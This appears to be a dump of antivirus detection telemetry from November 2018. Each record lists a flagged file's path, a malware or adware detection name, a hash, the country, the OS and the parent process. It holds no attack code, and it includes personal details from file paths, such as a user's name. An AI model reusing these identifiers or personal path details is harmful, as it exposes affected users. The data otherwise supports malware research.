  Row(detection=Row(filename='avscan-20181102-061539-b0ae1cf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061539-B0AE1CF9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052207-361e3404', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052207-361E3404', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051916-d077a4a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051916-D077A4A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055103-410208d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055103-410208D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062422-e86e8c30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062422-E86E8C30', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055716-1f5e0e76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055716-1F5E0E76', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061503-9b5e06d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061503-9B5E06D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='african farm.exe', filepath='E:\\العاب\\African Farm\\African Farm.exe', filesize=2368000, name='W32/Sality.AT.#M1.#R1'), hash='77fab084931064bb1820d011cdad9ab3772cb2cf72d0237318dd3e0f32f7f0db', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T18:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054400-44abadb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054400-44ABADB1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060649-74a4e52c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060649-74A4E52C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-155044-8c8067ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155044-8C8067EC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T06:07:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155308-a4e4d9f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155308-A4E4D9F1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0c8b7dfebfc3ecaa33ba41678ebd0ea96d6e7aabb796cd268b46f63e5b2e72c7.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0C8B7DFEBFC3ECAA33BA41678EBD0EA96D6E7AABB796CD268B46F63E5B2E72C7.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0c8b7dfebfc3ecaa33ba41678ebd0ea96d6e7aabb796cd268b46f63e5b2e72c7', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:15:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160244-05bf1686', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160244-05BF1686', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sbeagentupgrader.exe', filepath='C:\\ProgramData\\VIPRE Business Agent\\Downloads\\SBEAgentUpgrader.exe', filesize=480000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='0188bf7cf780331bcef40de46ea8c9bd34f17ed7e681b496893f590ac5ab1df1', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\VIPRE Business Agent\\SBAMSvc.exe', parentsize=6534200, timestamp='2018-11-01T03:57:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:28:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155443-b4bdaa22', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155443-B4BDAA22', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154614-5f0b0b7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154614-5F0B0B7F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hrd_audit(garmen)_old.scr', filepath='D:\\DATA_SHARE\\program\\hrd_audit(GARMEN)_OLD\\hrd_audit(GARMEN)_OLD.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oktober.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\GAJI RPG\\OKTOBER\\OKTOBER.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='135464244321145.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\135464244321145.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='247421245311304.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\247421245311304.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6446937\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\aTubeCatcher_0650332926.exe', parentsize=2435998, timestamp='2018-11-01T00:44:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jscript.dll', filepath='E:\\暴风影音\\jscript.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='13dc69c57b8bc1243e3610c489b68a1a67d35c47cc85e358b71ea3f951c4ec9a', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:10:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111447-7fa35114', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_08abe59c\\AVSCAN-20181101-111427-7BC35216\\AVSCAN-20181101-111447-7FA35114', filesize=704000, name='TR/Crypt.ZPACK.0340cb.#M1.#R1'), hash='0340cb52b73987678952ae42cbe81058dee4f54c8dbf0388b6905a92d3f36210', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:15:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160014-ec819c6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160014-EC819C6C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='199053535918533.exe', filepath='\\\\?\\C:\\Temp\\199053535918533.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:15:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='november 2014.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PERSIAPAN AUDIT\\LAPORAN P2K3\\P2K3 NOVEMBER 2014\\NOVEMBER 2014.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171725-ba220be0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cae6e045\\AVSCAN-20181101-171616-ADA5310B\\AVSCAN-20181101-171725-BA220BE0', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:17:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T16:02:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111838-3494c4af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111838-3494C4AF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:18:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='002-[s] - ปนัดดา เรืองวุฒิ [my inspiration].exe', filepath='E:\\music\\music\\Vampires 652 P\\002-[S] - ปนัดดา เรืองวุฒิ [My Inspiration]\\002-[S] - ปนัดดา เรืองวุฒิ [My Inspiration].exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='dbdd1f8a03949ae65ac57fe82307c00daebfc396d54cb63274528cb6abac7a75', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:13:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Desktop\\datos\\Documents and Settings\\pc\\Escritorio\\back up\\Adobe Illustrator Installer\\Illustrator 10\\Installer\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='5caba6ff2320ec54114ddb1c4a726fcf8e303f25a2bd9970cd32e276fa95ed36', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:WbzpCeV2OU6WROfV.1', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T13:24:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nspDD3A.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:13:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T08:37:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8.3.2.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 8.3.2\\8.3.2.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110634-d9519d84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110634-D9519D84', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='174.dll', filepath='\\\\?\\C:\\Program Files\\-ViewPassword-soft\\174.dll', filesize=192000, name='Adware/AddLyrics.192000.17.#M1.#R1'), hash='5d27ba6e0d8d2947ab021d5a26028aab3ed8a01b28028572702e42c0ab928bd3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:18:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='freeyoutubedownload.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\FreeYouTubeDownload.exe', filesize=32952000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='991e00c0851258b4cb32d31e56939b31f31c4f1d4e7fd97a3315621bffaf1485', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lanzador.exe', filepath='\\\\?\\C:\\Lista_CV\\Lanzador.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='d1d40f2a8c00a5ec11252ac6ea77efa434d37d54079b2d9746ed1b9004d3dd0d', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ptedit32.exe', filepath='I:\\BACKUPs--125GB\\Program Files\\Symantec\\Norton PartitionMagic 8.0\\RESCUEME\\DOSYSTEM\\PTEDIT32.EXE', filesize=512000, name='TR/Patched.Gen.#M300.#R2947'), hash='92370f2470ec2deb9200739fabb4edb783634d53a052710893053be98703ea24', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T23:47:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-082121-b5a0afc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d4a29c44\\AVSCAN-20181101-082103-B36EC176\\AVSCAN-20181101-082121-B5A0AFC3', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='manual.exe', filepath='C:\\Users\\X\\Documents\\Call Of Duty\\Docs\\Help\\Manual\\Manual.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:10:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='776beede732ca44a03977e2c4354c8a12ae5e091c292313f8107154de98b3f3d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\776BEEDE732CA44A03977E2C4354C8A12AE5E091C292313F8107154DE98B3F3D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='776beede732ca44a03977e2c4354c8a12ae5e091c292313f8107154de98b3f3d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='89b60fb73d586146af97f822463ec751e00eb4d4641f37d6a454afd39a2e80bd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\89B60FB73D586146AF97F822463EC751E00EB4D4641F37D6A454AFD39A2E80BD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='89b60fb73d586146af97f822463ec751e00eb4d4641f37d6a454afd39a2e80bd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:09:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_c2bcaee2.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_c2bcaee2.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='d9186a5819ffad47f82a6e1720812a0589ad39f9fda4f4c32e690f1205f8e2e3', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0053987.dll', filepath='g:\\system volume information\\_restore{6428f543-31d7-4f50-a73d-00430e005dd2}\\rp43\\A0053987.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='553373c83885d2881f84dda86811e62ccb2c666cdfd37135b8d126f778a1a711', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:20:15Z'), dt=datetime.date(2018, 11, 1)),
